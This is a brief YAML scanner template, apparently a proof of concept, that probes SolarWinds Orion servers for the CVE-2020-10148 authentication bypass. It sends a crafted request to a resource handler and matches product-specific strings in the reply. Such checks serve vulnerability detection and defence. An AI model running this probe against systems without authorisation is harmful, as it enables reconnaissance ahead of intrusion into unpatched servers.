name: poc-yaml-solarwinds-cve-2020-10148
set:
  r1: randomInt(800000000, 1000000000)
rules:
  - method: GET
    path: /web.config.i18n.ashx?l=en-US&v={{r1}}
    expression: |
      response.status == 200 && response.body.bcontains(bytes("SolarWinds.Orion.Core.Common")) && response.body.bcontains(bytes("/Orion/NetPerfMon/TemplateSiblingIconUrl"))
detail:
  author: su(https://suzzz112113.github.io/#blog)
  CVE: CVE-2020-10148
  links:
    - https://kb.cert.org/vuls/id/843464